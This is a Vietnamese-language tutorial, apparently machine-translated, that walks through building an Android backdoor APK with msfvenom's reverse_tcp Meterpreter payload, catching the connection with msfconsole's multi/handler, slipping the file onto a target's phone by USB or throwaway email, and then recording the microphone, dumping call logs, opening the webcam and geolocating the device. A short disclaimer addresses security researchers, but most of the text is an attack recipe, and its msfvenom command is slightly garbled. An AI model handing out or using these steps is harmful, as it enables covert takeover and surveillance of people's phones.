Điện thoại thông minh Android thường là cổng vào hầu hết các tiện ích IoT thương mại. Báo động có khói trong Nest được quản lý thông qua một ứng dụng Android có liên quan. Một Nest Thermostat để kiểm soát nhiệt độ cũng vậy. Khóa thông minh, cam chuông cửa - hầu hết tất cả các thiết bị thông minh đều có thể được truy cập từ Alexa hoặc các ứng dụng chính khác. Điều gì sẽ xảy ra nếu ai đó có được quyền truy cập từ xa vào một chiếc điện thoại Android như vậy? Bạn nghĩ rằng điều này là không thể? Đối với điều này, chúng tôi sẽ cung cấp một bản trình diễn cơ bản về cách có thể sử dụng “metasploit” Kali Linux để tạo một mục nhập cửa sau cho điện thoại Android của bạn.
Lưu ý :hướng dẫn này dành cho các nhà nghiên cứu bảo mật và những người yêu thích. Chúng tôi khuyên bạn không nên hack điện thoại của bất kỳ ai mà không có sự cho phép của họ.
Bối cảnh
Trước khi bắt đầu làm việc trên Kali Linux, trước tiên bạn cần tự làm quen với thiết bị đầu cuối bảng điều khiển của nó.
Nó dễ dàng lưu trữ một danh sách đầy đủ các công cụ được thiết kế để nhắm mục tiêu chương trình cơ sở hoặc hệ điều hành của thiết bị.
Ở đây, chúng tôi sẽ sử dụng một trong những công cụ phổ biến có tên “MSFVenom” để chèn vi-rút vào điện thoại Android. Nó tạo ra nhiều loại trọng tải dựa trên các tùy chọn do người dùng lựa chọn. Khai thác hoạt động trên nhiều nền tảng bao gồm Windows, Android, OpenBSD, Solaris, JAVA, PHP và phần cứng chơi game.
Khởi chạy Metasploit Android
Các bước sau sẽ trình bày cách tải xuống MSFVenom trên hệ thống Kali Linux.
Khởi động thiết bị đầu cuối và nhập lệnh sau.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
Tại đây, tải trọng được khởi chạy bằng cách sử dụng tiện ích mở rộng Khai thác được gọi là “Meterpreter”.
Để xác định địa chỉ IP của máy chủ lắng nghe, hãy mở một thiết bị đầu cuối bảng điều khiển mới và nhập ifconfig . Thông thường, cổng 4444 được chỉ định cho trojan, khai thác và vi rút.
Khi địa chỉ IP đã được xác định, hãy quay lại màn hình trước đó và nhập thông tin chi tiết.
Tệp “hackand.apk” sẽ được lưu trong máy tính để bàn và là cách khai thác backdoor chính được sử dụng trên điện thoại Android.
Trong bước tiếp theo, khởi chạy “msfconsole”, một công cụ kiểm tra thâm nhập phổ biến được sử dụng với Kali Linux. Đối với điều này, hãy nhập service postgresql start theo sau là msfconsole . PostgreSQL đề cập đến một cơ sở dữ liệu nơi bảng điều khiển đã được lưu trữ.
Khi công cụ thâm nhập đã sẵn sàng, bạn có thể khởi chạy phần khai thác còn lại.
Tiếp theo, một tệp thực thi được gọi là “multi-handler” sẽ được sử dụng.
use multi/handler
Tham khảo hình ảnh bên dưới để kết nối khai thác với bảng điều khiển. Địa chỉ IP và số cổng giống nhau sẽ được sử dụng.
Trong giai đoạn tiếp theo, khai thác msfvenom sẽ được khởi chạy và khởi tạo bằng một exploit đơn giản yêu cầu. Bây giờ, chúng tôi phải tìm mục tiêu sẽ là điện thoại Android.
Kết nối Kali Linux Terminal với Điện thoại Android
Tệp hackand.apk mà chúng tôi đã tải xuống trước đó chỉ có kích thước 10 KB. Bạn sẽ phải tìm cách chèn tệp vào điện thoại của mục tiêu. Bạn có thể chuyển vi-rút bằng USB hoặc dịch vụ email tạm thời.
Nói chung, các nhà cung cấp email trực tuyến như Gmail hoặc Yahoo sẽ từ chối mang tệp bị nhiễm vi-rút này.
Android sẽ cảnh báo bạn trước khi bạn chèn phần mềm. Tuy nhiên, chỉ mất chưa đầy 20 giây để hoàn tất quá trình cài đặt vì bạn chỉ phải “bỏ qua rủi ro và cài đặt”. Điều này làm cho mối đe dọa trở nên nghiêm trọng nếu điện thoại của bạn đang ở chế độ mở khóa.
Như được trình bày ở đây, rất nhiều thiệt hại có thể xảy ra đối với điện thoại bao gồm sửa đổi nội dung lưu trữ, ngăn điện thoại ở chế độ ngủ, kết nối và ngắt kết nối khỏi Wi-Fi, cài đặt hình nền, v.v.
Khi tệp APK được cài đặt, nó có thể được ngụy trang khéo léo trong điện thoại.
Bây giờ, bạn có thể sử dụng nhiều lệnh như sau trên thiết bị đầu cuối Kali Linux để điều khiển điện thoại. Bạn thực sự không cần phải nhớ chúng vì danh sách này có sẵn từ một help đơn giản tùy chọn trong meterpreter .
-
record_mic:ghi âm micrô -
dump calllog:lấy nhật ký cuộc gọi -
webcam_chat:bắt đầu trò chuyện video -
geolocate:lấy vị trí hiện tại của điện thoại
Hầu hết các điện thoại Android tiên tiến sẽ ngăn không cho cài đặt ứng dụng độc hại này. Vì vậy, cách khai thác này thường sẽ hoạt động với các mẫu Android cũ hơn.
Suy nghĩ
Trong hướng dẫn này, chúng tôi đã thấy một chiến lược cơ bản sử dụng Kali Linux để có quyền truy cập vào điện thoại thông minh Android. Mặc dù đây là một cách khai thác rất đơn giản nhưng nó có ý nghĩa rất lớn về mặt bảo mật IoT.
Bạn nghĩ gì về việc khai thác Kali Linux? Bạn sẽ thận trọng hơn về bảo mật của điện thoại chứ? Hãy cho chúng tôi biết trong các ý kiến.